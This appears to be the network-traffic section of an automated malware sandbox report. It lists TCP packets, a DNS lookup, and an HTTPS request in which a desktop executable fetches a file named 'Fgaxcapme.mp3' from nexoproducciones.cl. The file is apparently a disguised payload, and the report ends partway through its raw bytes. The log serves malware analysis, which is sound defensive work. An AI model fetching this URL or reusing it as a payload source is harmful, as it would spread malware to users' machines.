Jul 3, 2024 16:17:03.836318970 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.836361885 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.919872999 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.919893980 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.919976950 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.919995070 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.920046091 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.920269012 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.920284986 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.920340061 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.920346975 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.920377970 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.920397997 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.920830011 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.920845985 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.920906067 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.920912981 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.920953989 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.921323061 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.921339035 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.921401024 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.921406984 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.921448946 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.921998978 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.922014952 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.922075033 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.922080040 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.922126055 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.922976971 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.922992945 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.923052073 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.923058033 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.923098087 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.923490047 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.923507929 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.923556089 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.923561096 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.923573017 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.923604965 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.923626900 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.923634052 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.923661947 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.923680067 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.016748905 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.016772985 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.016875029 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.016891956 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.016948938 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.017229080 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.017251015 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.017309904 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.017316103 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.017354965 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.017982006 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.017998934 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.018054008 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.018059015 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.018090010 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.018181086 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.018682003 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.018698931 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.018769979 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.018775940 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.018821001 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.019222021 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.019236088 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.019294024 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.019299984 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.019341946 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.019866943 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.019884109 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.019938946 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.019948959 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.019963980 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.019996881 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.020049095 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.020714998 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.020730019 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.020802975 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.020808935 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.062962055 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.120923042 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.120946884 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.121027946 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.121042967 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.121085882 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.121473074 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.121489048 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.121548891 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.121555090 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.121623993 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.121992111 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.122008085 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.122056007 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.122061968 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.122107029 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.122107029 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.122699976 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.122715950 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.122771978 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.122777939 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.122822046 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.123234034 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.123251915 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.123311043 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.123316050 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.123354912 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.123516083 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.123529911 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.123577118 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.123583078 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.123632908 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.124464989 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.124494076 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.124536991 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.124538898 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.124552965 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.124571085 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.124572039 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.124598980 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.124639988 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.124644995 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.124682903 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.207930088 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.207951069 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.208014965 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.208029032 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.208076954 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.208342075 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.208359003 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.208415985 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.208421946 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.208472013 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.208909035 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.208924055 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.208966970 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.208972931 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.209005117 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.209028006 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.209348917 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.209367037 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.209414005 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.209419966 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.209455967 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.209481001 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.209769011 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.209785938 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.209840059 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.209846973 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.209891081 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.210203886 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.210220098 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.210275888 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.210282087 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.210320950 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.210659981 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.210675001 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.210726023 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.210731983 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.210763931 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.210791111 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.211220026 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.211235046 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.211292028 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.211297035 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.211347103 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.294692993 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.294714928 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.294778109 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.294802904 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.294825077 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.294857025 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.295511007 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.295527935 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.295612097 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.295612097 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.295619965 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.295660019 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.296047926 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.296063900 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.296263933 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.296269894 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.296322107 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.296680927 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.296698093 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.296735048 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.296741009 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.296767950 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.296786070 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.297379017 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.297394991 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.297449112 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.297455072 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.297508001 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.298068047 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.298089027 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.298131943 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.298140049 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.298165083 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.298180103 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.298629045 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.298644066 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.298695087 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.298701048 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.298743963 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.339237928 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.339258909 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.339312077 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.339327097 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.339355946 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.339379072 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.382390022 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.382411003 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.382488966 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.382503033 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.382545948 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.382925034 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.382941961 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.382992029 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.382996082 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.383032084 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.383045912 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.383563995 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.383579969 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.383620024 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.383625984 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.383662939 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.383682966 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.384198904 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.384216070 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.384268999 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.384274960 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.384319067 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.384335995 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.384680986 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.384696007 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.384752035 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.384757996 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.384800911 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.385333061 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.385349035 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.385396957 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.385402918 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.385437012 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.385454893 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.386039019 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.386056900 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.386104107 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.386110067 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.386135101 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.386153936 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.426428080 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.426449060 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.426515102 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.426532984 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.426620007 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.469536066 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.469556093 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.469619036 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.469647884 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.469670057 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.469695091 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.470041037 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.470056057 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.470093966 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.470099926 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.470134974 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.470153093 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.470719099 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.470733881 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.470793962 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.470801115 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.470848083 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.471247911 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.471265078 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.471326113 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.471332073 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.471376896 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.472363949 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.472385883 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.472441912 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.472446918 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.472507954 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.472995996 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.473011017 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.473040104 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.473083019 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.473088980 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.473098993 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.473113060 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:04.473156929 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:04.481631041 CEST	49704	443	192.168.2.11	104.21.10.178

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 16:17:02.040129900 CEST	60120	53	192.168.2.11	1.1.1.1
Jul 3, 2024 16:17:02.084682941 CEST	53	60120	1.1.1.1	192.168.2.11
Jul 3, 2024 16:17:19.859281063 CEST	53	53566	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 3, 2024 16:17:02.040129900 CEST	192.168.2.11	1.1.1.1	0x343e	Standard query (0)	nexoproducciones.cl	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 3, 2024 16:17:02.084682941 CEST	1.1.1.1	192.168.2.11	0x343e	No error (0)	nexoproducciones.cl		104.21.10.178	A (IP address)	IN (0x0001)	false
Jul 3, 2024 16:17:02.084682941 CEST	1.1.1.1	192.168.2.11	0x343e	No error (0)	nexoproducciones.cl		172.67.146.41	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

nexoproducciones.cl

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49704	104.21.10.178	443	6740	C:\Users\user\Desktop\q86onx3LvU.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 14:17:02 UTC	82	OUT	GET /Fgaxcapme.mp3 HTTP/1.1 Host: nexoproducciones.cl Connection: Keep-Alive
2024-07-03 14:17:02 UTC	735	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 14:17:02 GMT Content-Type: audio/mpeg Content-Length: 2276872 Connection: close last-modified: Tue, 25 Jun 2024 22:42:32 GMT Cache-Control: public, max-age=2592000 expires: Tue, 30 Jul 2024 22:21:40 GMT vary: Accept-Encoding CF-Cache-Status: HIT Age: 230122 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yvYG49eGczkmrkUYxhRSEmeN1sA8LBIwSW1T43lo3bqMHzrSnJrI3bkiRWHfxBPszotFpIFmHgKlcbgsElz0tjgeUnCb6CGpaECXOlPZUkAoPpnOjF1XBoaH157FfuHujqtOgr%2BE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d77f30083342e8-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 14:17:02 UTC	634	IN	Data Raw: a0 be 96 57 9a 15 10 d7 28 44 5a 7d 88 01 ec 9d 8b 35 b4 31 18 75 52 9a 28 09 f5 b7 3e 68 be af 48 cd 0f 9e f7 2d 57 03 9c 11 e1 ae 7d 17 1f f1 8f b0 d5 32 c3 a9 dd ba 2b a9 d7 3d ab 2d 70 6c e5 19 8b f8 78 92 60 63 3f e2 8e 42 0e 03 5f b6 23 3a f3 7d 27 23 4b f9 c8 8a 83 ca a0 de 02 bf e8 31 ab 4d b4 65 39 0e 34 a7 39 e2 a1 9b 84 54 f3 7d 42 e5 87 31 55 cf d9 f7 6a 1d d5 e6 bc c8 d1 40 7d 64 e8 95 bc 23 ee e4 f8 75 5b 0c e7 88 dd 96 0e de 0d 14 55 88 bd 1c d3 8c 62 1c a7 59 21 60 93 8d 1c 77 b9 bb 05 a7 01 b1 8e e7 0b 66 46 c9 65 b0 11 c6 af 4f 04 73 02 7b 22 8a a3 a9 42 07 e7 45 af 8e 1c cd 02 f6 42 49 d5 70 43 29 f0 e3 c4 d7 58 a9 03 a9 21 44 56 49 36 d9 3b 85 ef f0 6d a0 ed 9f 7e 47 fb 0e c6 b5 1b 8a d7 e9 48 